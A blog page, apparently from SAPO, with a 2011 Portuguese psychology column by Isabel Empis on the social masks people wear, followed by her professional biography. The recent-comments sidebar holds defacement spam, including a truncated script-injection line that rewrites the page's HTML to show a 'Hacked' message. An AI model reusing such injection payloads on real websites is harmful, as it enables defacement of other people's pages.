Ousar Ser @ 15:12

Sex, 30/09/11

Vestimos inúmeras máscaras das quais podemos não ter consciência, por nos identificarmos aos nossos próprios papéis.

E é assim que a nossa pessoa se pode encontrar -e muitas vezes está entalada nas nossas personagens.

Tomar consciência de quem somos, de onde está o nosso "eu",e de quais as personagens que a nossa "pessoa" usa nas mais diversas situações, é essencial para não vivermos de empréstimo e com aquela sensação de estarmos a passar como que  ao largo de nós próprios.

Que se aprenda a "Usar o que se aprendeu através do que se é" (e não em vez do que se é!) é o objectivo de toda a minha actuação profissional bem como desta rubrica e deverá ser a base de todos os nossos relacionamentos tanto com os outros como connosco próprios e com tudo aquilo que estudámos e em que trabalhamos.

Só pode haver saúde mental, social, familiar, profissional e mesmo física, se aprendermos a passar pós nós próprios, para saber lidar através de quem de facto somos, com a  nossa vida do dia a dia. Isabel Empis

 

 

ISABEL EMPIS:

Psicóloga clínica pela universidade de genève dirigida por jean Piaget,

Aí lecionou durante 3 anos,e de regresso a Lisboa foi ainda docente  na faculdade de psicologia e de ciências da educação durante 8 anos e no ISPA (instituto português de psicologia aplicada) mais 5 anos.

Iniciou a sua formação psicanalítica na suíça com a sua psicanálise pessoal durante 6 anos, sendo sóca da SPP (sociedade portuguesa de psicanálise) desde 1978,e recentemente da AP (associação portuguesa de psicanálise psicoterapia psicanalítica),pratica a psicoterapia e a psicanálise em privado desde 1979.

Integrou as equipes do então centro de saúde mental infantil e juvenil de lisboa,

dirigido por João dos santos ,com quem trabalhou directamente durante 7 anos e mais tarde integrou o quadro dos psicólogos do hospital Miguel bombarda, onde trabalhou 14 anos na equipe de saúde mental de Sintra.

É autora de 4 livros que se podem classificar como ensaios de saúde mental:

"Bem-aventurados...os que ousam!" em 2006,

"Eu quero amar,amar perdidamente" em 2008,

"Cada um vê o que quer num molho de couves-18 travessias psicoterapêuticas" em 2011 e

"Lições de vida" em 2010 ,em co-autoria com Salvador Mendes de Almeida,

todos com a editora LEYA-oficina do livro.

 

Promove desde há 4 anos um curso deFormaçãoComplementar em Psicologia, aberto a todos com a regularidade de duas horas semanais e que se estende de Janeiro a Julho, em Lisboa.

 

CONTACTO : isabelempis@hotmail.com



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO